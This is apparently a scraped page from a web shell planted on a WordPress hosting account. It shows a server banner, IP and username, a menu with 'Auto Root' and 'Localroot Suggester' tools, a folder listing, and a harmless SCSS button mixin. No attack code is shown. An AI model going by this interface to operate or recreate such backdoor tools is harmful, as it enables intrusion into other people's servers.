Linux premium71.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 216.73.216.206
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
cleahvkv /
public_html /
wp-admin /
css /
colors /
Delete
Unzip
Name
Size
Permission
Date
Action
blue
[ DIR ]
drwxr-xr-x
2025-05-10 01:37
coffee
[ DIR ]
drwxr-xr-x
2025-06-08 02:55
ectoplasm
[ DIR ]
drwxr-xr-x
2025-06-08 02:55
light
[ DIR ]
drwxr-xr-x
2025-06-08 02:55
midnight
[ DIR ]
drwxr-xr-x
2025-05-10 01:37
modern
[ DIR ]
drwxr-xr-x
2025-06-08 02:55
ocean
[ DIR ]
drwxr-xr-x
2025-05-10 01:37
sunrise
[ DIR ]
drwxr-xr-x
2025-05-10 01:37
.htaccess
237
B
-r-xr-xr-x
2025-05-10 01:37
_admin.scss
13.82
KB
-rw-r--r--
2020-02-20 23:13
_mixins.scss
1.07
KB
-rw-r--r--
2020-02-20 23:13
_variables.scss
2.07
KB
-rw-r--r--
2020-02-20 23:13
Save
Rename
/* * Button mixin- creates a button effect with correct * highlights/shadows, based on a base color. */ @mixin button( $button-color, $button-text-color: #fff ) { background: $button-color; border-color: $button-color; color: $button-text-color; &:hover, &:focus { background: lighten( $button-color, 3% ); border-color: darken( $button-color, 3% ); color: $button-text-color; } &:focus { box-shadow: 0 0 0 1px #fff, 0 0 0 3px $button-color; } &:active { background: darken( $button-color, 5% ); border-color: darken( $button-color, 5% ); color: $button-text-color; } &.active, &.active:focus, &.active:hover { background: $button-color; color: $button-text-color; border-color: darken( $button-color, 15% ); box-shadow: inset 0 2px 5px -3px darken( $button-color, 50% ); } &[disabled], &:disabled, &.button-primary-disabled, &.disabled { color: hsl( hue( $button-color ), 10%, 80% ) !important; background: darken( $button-color, 8% ) !important; border-color: darken( $button-color, 8% ) !important; text-shadow: none !important; } }